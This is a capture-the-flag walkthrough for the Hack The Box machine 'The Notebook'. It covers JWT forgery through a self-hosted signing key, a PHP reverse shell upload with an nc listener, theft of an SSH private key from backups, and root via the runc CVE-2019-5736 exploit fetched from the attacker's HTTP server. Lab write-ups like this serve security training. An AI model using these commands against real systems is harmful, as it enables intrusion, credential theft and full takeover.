🟠The Notebook

The Notebook - Hackthebox

OS: Linux

Difficulty: Medium

ip: 10.10.10.230

Nmap

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Web

First Page

creating an account

adding a new note

looking at cookies

auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6ImEiLCJlbWFpbCI6ImFAYS5jIiwiYWRtaW5fY2FwIjowfQ.X4xL9bF3x0l8Lclj9hIIUa_HxJcTUvKSh2i_gH9TyRs4d1rrK2TXR0AxYiJ_BL5ytJr0VdqQNKunaNobTps4NTOmOZX-hjzugYngjpUo_dbJsJIXx_3D49aycKN6qMS7VjrrS8qvZBWU_Lom3H6w057lFB3ITncrMg4UpaougjNEJbfZChQrDEDGEY01ZJntBOh_-JiaCUA3uznt9T98j425XObUDCyCaR0VUJF0W8fuKes9cpwehQDcx-0o9Y66aucBcaywz5Ddge96P0NB-l2E8AnJ0P2p8JDOMaoeCX05I8YEoGeEu99ougOfaVWxekP1nvpBPYjplIUxi-dscXShK8zJtqPHAoOzqVsL4SzJvbi_z8eDUyb5p0CAoUbrxqy44MoJ3JWWER781iemEISTcgUN3Bp_AlCK23awPR3ikzpz18QJZnHnCGnhJcdxhqFNm93-7jopjIroIGJjKjsV3gVxdqr4kFkoZdrHdpaob47RQd3MU0YfawEk6ZQ7qL2pGX-ZN4LskZ_83c5ijgch9zdYovLGJ6sfnwhEh91eAIR16Uz5rKDpjCu1zCOlibMZGyMbxml9dBBqiz1apoo99jGVdeYA9JW1iMiLWjmvpGzOkXhRAwT_OSH3XJ-Hqoj8eSCKY56nJCiDQ0Z5dQyntco01WWOKPYrUi4-HAs

this looks like a jwt

we can try to understand it better by pasting in https://jwt.io

we need a rsa-sha256 (4096) key pair to generate our jwt with "admin_cap=1"

we can use https://cryptotools.net/rsagen

now create a file called "privKey.key" with the same private key that we will use to generate the jwt. Then in the jwt header change "localhost" to your ip, so it will compare the jwt key with the key on your machine. Now we can simply change the "admin_cap" to 1 and we have a valid cookie (jwt) with admin permission

python3 -m http.server

put this jwt in your browser cookie and reload the page

now we can see the "admin panel" tab

we can upload files and view the notes

checking out "need to fix config"

this means we can get shell uploading a php reverse shell

so i used the one from pentest monkey

download the shell

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o rev.php

edit the shell putting your ip

start a listener

nc -lvnp 1234

and upload this php

click "view"

and we got shell

getting tty

python3 -c 'import pty;pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo;fg

export TERM=xterm

User

in /var/backups we have some interesting files,

www-data@thenotebook:/tmp$ ls -la /var/backups
total 696
drwxr-xr-x  2 root root     4096 Apr 15 06:26 .
drwxr-xr-x 14 root root     4096 Feb 12 06:52 ..
-rw-r--r--  1 root root    51200 Apr 15 06:25 alternatives.tar.0
-rw-r--r--  1 root root    33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r--  1 root root     3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r--  1 root root     3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r--  1 root root      437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r--  1 root root      172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r--  1 root root   571460 Feb 24 08:53 dpkg.status.0
-rw-------  1 root root      693 Feb 17 13:18 group.bak
-rw-------  1 root shadow    575 Feb 17 13:18 gshadow.bak
-rw-r--r--  1 root root     4373 Feb 17 09:02 home.tar.gz
-rw-------  1 root root     1555 Feb 12 06:24 passwd.bak
-rw-------  1 root shadow   1024 Feb 12 07:33 shadow.bak

so I created a directory inside /tmp/ and extracted these files to my directory

cd /tmp

mkdir a; cd a

tax -xf /var/backups/home.tar.gz

so inside the home file (/var/backups/home.tar.gz) we have the ssh private key from "noah" user

cd /home/noah/.ssh

cat id_rsa

copy the content to a file in your machine and log in as noah with this key

ssh -i id_rsa [email protected]

Privesc

sudo -l

Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

ok we can run this command (/usr/bin/docker exec -it webapp-dev01*) with any parameter as root without password, so we will use that to become root

Docker version

docker -v

Docker version 18.06.0-ce, build 0ffa825

searching for this version vulnerabilites

we can try to use one of these exploit, but we need runc, so let's check if runc exists in the target machine

which runc

/usr/sbin/runc

runc -v

runc version 1.0.0~rc6+dfsg1
commit: 1.0.0~rc6+dfsg1-3
spec: 1.0.1

the runc is in the exact version to run the exploits, let's run it

video to follow

in target machine run this to enter in the docker container

sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash

in our machine download the exploit from https://github.com/Frichetten/CVE-2019-5736-PoC

curl https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go -o main.go

change the payload

in this case, I changed the payload to

#!/bin/bash \n chmod +s /bin/bash

because this turn bash runnable as root without password

now build the exploit

go build main.go

start a python3 http server

python3 -m http.server

on container install the exploit

curl http://<your_ip>:8000/main -o exploit

chmod +x exploit

./exploit

in another terminal connect the ssh again and run

sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

after the message

'No help topic for '/bin/sh''

run

bash -p

and now we are root

cat /root/root.txt

PreviousKnife NextTry Hack Me Write-ups

Last updated 3 years ago